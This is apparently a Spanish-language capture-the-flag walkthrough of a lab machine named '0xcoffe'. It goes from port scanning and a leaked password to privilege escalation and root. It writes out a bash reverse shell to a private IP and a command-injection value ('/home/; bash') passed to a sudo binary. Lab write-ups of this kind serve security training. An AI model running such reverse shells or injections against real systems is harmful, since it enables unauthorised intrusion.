# 0xcoffe

Iniciando con un escaneo de puertos me encontre con  2 puertos abiertos.

<figure><img src="https://1902957005-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FEf5nvxpY8cEesBiBqWxx%2Fuploads%2FLs5WaEjve4LqkjRnO2Ck%2Fimage.png?alt=media&#x26;token=d52ab321-09de-48b1-b657-08abad4bf857" alt=""><figcaption></figcaption></figure>

En el puerto 80, probe algunos comandos de injection sql pero no tuve exito alguno, revise el codigo fuente pero no se logra ver nada relevante

<figure><img src="https://1902957005-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FEf5nvxpY8cEesBiBqWxx%2Fuploads%2FZtx9Z23MtQvQV6zYrDu2%2Fimage.png?alt=media&#x26;token=27deaf3f-cc8a-4f86-9175-8fe1e8e62795" alt=""><figcaption></figcaption></figure>

&#x20;reviso el puerto 7777 que es tambien un servicio web y me consigo con que puedo ver el directorio \~ aqui consigo un directorio llamado secret, al acceder me consigo con un .txt (history.txt)

<figure><img src="https://1902957005-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FEf5nvxpY8cEesBiBqWxx%2Fuploads%2FrHLiz0JIkROnEljrySa2%2Fimage.png?alt=media&#x26;token=6e1daeee-a9fc-4930-be61-d60d762e4feb" alt=""><figcaption></figcaption></figure>

Tras leer el archivo .txt noto una palabra que me llamo la atencion "super\_secure\_password".\
Probe con ingresarla en la web que se aloja en el puerto 80, y logre obtener acceso al mismo.

Una vez dentro, pruebo con obtener una rev. shell<br>

&#x20;script.sh\
/bin/bash -i >& /dev/tcp/192.168.47.130/4444 0>&1\
\
Intento de ejecutar sudo -l pero me solicita una contraseña.\
\
Por lo que revisando los directorios de los usuarios del sistema solo tengo permiso de accder en /home/codebad donde me encuentro con un directorio llamado secret que al acceder a el consigo un archivo llamado adivina.txt cat adivina.txt

La respuesta es: malware

La respuesta es: malware

<figure><img src="https://1902957005-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FEf5nvxpY8cEesBiBqWxx%2Fuploads%2Fuc2xeJRZOc6J3VSBQk6P%2Fimage.png?alt=media&#x26;token=480ff9b7-59e2-45d0-9e22-c1a6784d4961" alt=""><figcaption></figcaption></figure>

Una vez dentro del usuario codebad, ejecuto sudo -l para ver si es posible escalar privilegios.\
Saliendo como resultado algo que en un principio no tenia muy en claro que podria hacer

<figure><img src="https://1902957005-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FEf5nvxpY8cEesBiBqWxx%2Fuploads%2Fo3UL91bLRSk3tWFOBHhN%2Fimage.png?alt=media&#x26;token=3a855c77-8365-44c8-9e32-3dcce3deeab4" alt=""><figcaption></figcaption></figure>

Si intentamos leer el script, estará en un formato ilegible, pero podemos probar en ejecutarlo y ver que pasa:

<figure><img src="https://1902957005-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FEf5nvxpY8cEesBiBqWxx%2Fuploads%2FYztD8OJukeYJLm2gXMhr%2Fimage.png?alt=media&#x26;token=2ad93fa7-2896-497a-8b7b-a0273d703317" alt=""><figcaption></figcaption></figure>

Al hacer uso de ";" y poner `whoami; ls`,  ejecuta ambos a la misma vez.&#x20;

```
sudo -u metadata /home/codebad/code "/home/; bash"
```

Esto hará que se ejecute el binario bash y podremos escalar privilegios al usuario "metadata".

<figure><img src="https://1902957005-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FEf5nvxpY8cEesBiBqWxx%2Fuploads%2FBnIwf12MEBHV3SXMtTLS%2Fimage.png?alt=media&#x26;token=d0266ccc-2a03-4601-b0a3-3427b00a2d05" alt=""><figcaption></figcaption></figure>

por lo que una vez con los privilegios intente ver si podia habia forma de escalar a root por medio de sudo pero pide una contraseña

Asique me puse a buscar si habia algún archivo con el nombre de "metadata" con el siguiente comando

<br>

```
find / -name "meta*" 2>/dev/null
```

\
Donde uno en especial me llamo la atencion&#x20;

<figure><img src="https://1902957005-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FEf5nvxpY8cEesBiBqWxx%2Fuploads%2FNMhVQdMXeVntDuds8qvl%2Fimage.png?alt=media&#x26;token=a8f60d1b-59fe-40ad-aa36-bfec0975f441" alt=""><figcaption></figcaption></figure>

El ejecutarlo no da mucho resultado, asique probe considerando el nombre como una posible contraseña.

\ <br>

<figure><img src="https://1902957005-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FEf5nvxpY8cEesBiBqWxx%2Fuploads%2FNKrj0EP7APWKus71fkCp%2Fimage.png?alt=media&#x26;token=0666a739-f283-427e-b0c5-aa83e0e8407b" alt=""><figcaption></figcaption></figure>

Teniendo como resultado la forma de escalar a root

<figure><img src="https://1902957005-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FEf5nvxpY8cEesBiBqWxx%2Fuploads%2FAp4wPHwkmXEyQiY8ieX0%2Fimage.png?alt=media&#x26;token=c8bb9904-fa7f-4744-b942-7e921add8954" alt=""><figcaption></figcaption></figure>

<figure><img src="https://1902957005-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FEf5nvxpY8cEesBiBqWxx%2Fuploads%2FlzEFh08BVdER7pBdJoRF%2Fimage.png?alt=media&#x26;token=ca35de4a-393d-4ed8-b242-164b8cef2e5c" alt=""><figcaption></figcaption></figure>

PWNED!!